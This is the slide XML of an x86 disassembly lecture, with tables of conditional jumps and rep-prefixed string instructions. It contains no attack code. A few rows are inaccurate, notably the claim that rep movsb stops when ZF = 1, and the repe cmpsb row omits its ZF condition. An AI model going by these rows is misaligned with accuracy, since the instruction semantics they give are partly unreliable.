                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jl loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="837" name="Google Shape;837;p82"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4716016" y="2636912"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535125"/>
                <a:gridCol w="2425325"/>
              </a:tblGrid>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jle loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000"/>
                        <a:t>&lt;=</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jb loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000"/>
                        <a:t>Jl, unsinged</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jbe loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000"/>
                        <a:t>Jle, unsigned</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jo loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000"/>
                        <a:t>Overflow flag</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>OF=1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>js loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000"/>
                        <a:t>Sign flag SF=1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jecxz</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t> loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000"/>
                        <a:t>ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="20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t/>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="20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t/>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>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83"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Google Shape;844;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="7067128"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Rep (repeat – until ECX=0)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ESI, EDI used for source and dest. index</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ECX used as a counter.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Repeat until ECX = 0 or ZF = 1 (or 0)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="845" name="Google Shape;845;p83"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2483768" y="1844824"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1786325"/>
                <a:gridCol w="2822175"/>
              </a:tblGrid>
              <a:tr h="499250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="576075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>rep</a:t>
                      </a:r>
                      <a:endParaRPr sz="26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rPr lang="en-GB" sz="2000"/>
                        <a:t>Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="576075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>repe, repz</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600">
                        <a:latin typeface="Teko"/>
                        <a:ea typeface="Teko"/>
                        <a:cs typeface="Teko"/>
                        <a:sym typeface="Teko"/>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Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> until  ECX = 0 or ZF = 0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="652875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>repne, repnz</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600">
                        <a:latin typeface="Teko"/>
                        <a:ea typeface="Teko"/>
                        <a:cs typeface="Teko"/>
                        <a:sym typeface="Teko"/>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Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>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84"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;p84"/>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Rep (repeat – until ECX=0) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="852" name="Google Shape;852;p84"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259632" y="1844824"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2735300"/>
                <a:gridCol w="4321475"/>
              </a:tblGrid>
              <a:tr h="499250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="576075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>repe cmpsb</a:t>
                      </a:r>
                      <a:endParaRPr sz="26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rPr lang="en-GB" sz="2000"/>
                        <a:t>Compare to data buffers. ESI, EDI are buffers’ locations. Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> until  ECX = 0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="576075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>rep stosb</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600">
                        <a:latin typeface="Teko"/>
                        <a:ea typeface="Teko"/>
                        <a:cs typeface="Teko"/>
                        <a:sym typeface="Teko"/>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Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Initialize all bytes of a buffer to a certain value</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="652875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2600">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>rep movsb</a:t>
                      </a:r>
                      <a:endParaRPr sz="2600">
                        <a:latin typeface="Teko"/>
                        <a:ea typeface="Teko"/>
                        <a:cs typeface="Teko"/>
                        <a:sym typeface="Teko"/>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2000"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Copy a buffer of bytes. Repeat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t> until  ECX = 0 or ZF = 1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
